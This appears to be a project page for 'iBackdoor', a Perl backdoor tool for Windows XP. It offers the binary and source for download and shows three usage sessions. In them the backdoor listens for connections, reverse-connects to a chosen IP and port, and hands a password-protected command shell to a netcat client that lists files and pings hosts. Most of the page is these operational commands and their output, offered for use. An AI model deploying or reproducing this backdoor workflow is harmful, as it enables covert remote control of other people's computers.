iBackdoor

Homepage

Env: windows xp sp2, ActiveStatePerl 5.8.6, Cwd/IO::Pipe/IO::Socket/IO::Select.

Download: Binary iBackdoor.rar | Source iBackdoor.pl

NC(netcat): http://www.vulnwatch.org/netcat/nc111nt.zip

eXample:

1.cmd1

                                                                    backward_ip   backward_port
                                                                            |                  |
D:\Perl\scripts\Security\iBackdoor>iBackdoor.pl -b 127.0.0.1 -p 5555

2006/09/28 15:46:23, enable backward-mode to '127.0.0.1:5555'
2006/09/28 15:46:23, listening on local port '9803'.

2006/09/28 15:46:37, connected from '127.0.0.1:3443'.
2006/09/28 15:47:06, closed to '127.0.0.1:3443'.
2006/09/28 15:47:56, backward connect to '127.0.0.1:5555'
2006/09/28 15:48:09, closed to '127.0.0.1:5555'.
... ...

2.cmd2

C:\>nc localhost 9803

        Welcome to the machine ......

Password: 123456

[i@D:/Perl/scripts/Security/iBackdoor]% pwd
D:/Perl/scripts/Security/iBackdoor
[i@D:/Perl/scripts/Security/iBackdoor]% ls
 驱动器 D 中的卷没有标签。
 卷的序列号是 7818-950A

 D:\Perl\scripts\Security\iBackdoor 的目录

2006-09-28  15:46    <DIR>          .
2006-09-28  15:46    <DIR>          ..
2006-09-27  01:20               570 b.pl
2006-09-28  15:46             6,898 iBackdoor.pl
2006-09-23  09:46             1,695 readme.txt
2006-09-27  00:44             7,183 复件 iBackdoor.pl
               4 个文件         16,346 字节
               2 个目录  6,791,729,152 可用字节
[i@D:/Perl/scripts/Security/iBackdoor]% ping
www.google.com

Pinging www-china.l.google.com [64.233.189.104] with 32 bytes of data:

Reply from 64.233.189.104: bytes=32 time=39ms TTL=247
Reply from 64.233.189.104: bytes=32 time=40ms TTL=247
Reply from 64.233.189.104: bytes=32 time=39ms TTL=247
Reply from 64.233.189.104: bytes=32 time=39ms TTL=247

Ping statistics for 64.233.189.104:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 39ms, Maximum = 40ms, Average = 39ms
[i@D:/Perl/scripts/Security/iBackdoor]% quit

        Bye.

C:\>

3.cmd3

C:\>nc -l -p 5555 localhost #wait about 30s at most

        Welcome to the machine ......

Password: 123456

[i@D:/Perl/scripts/Security/iBackdoor]% quit

        Bye.